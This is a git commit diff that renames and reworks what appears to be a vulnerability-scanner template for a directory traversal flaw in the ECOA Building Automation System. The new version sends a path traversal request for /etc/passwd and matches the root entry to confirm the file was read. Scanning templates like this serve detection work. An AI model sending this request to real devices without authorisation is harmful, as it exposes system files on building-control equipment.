Update and rename ecoa-building-directory-traversal.yaml to ecoa-building-lfi.yaml

2021-09-25 11:22:48 +05:30 · 2021-09-25 11:22:48 +05:30 · 2e7e35eb70
parent fac7f96b34
commit 2e7e35eb70
1 changed files with 7 additions and 9 deletions
--- a/vulnerabilities/other/ecoa-building-directory-traversal.yaml
+++ b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
@ -1,4 +1,4 @@
-id: ecoa-building-directory-traversal
+id: ecoa-building-lfi

 info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
@ -6,18 +6,16 @@ info:
  severity: high
  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
-  tags: ecoa,traversal
+  tags: ecoa,lfi

 requests:
  - raw:
      - |
-        GET /fmangersub?cpath=/ HTTP/1.1
+        GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
-      - type: word
-        words:
-          - "bacevent.elf"
-          - "redown.elf"
-          - "system.bin"
-        condition: and
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body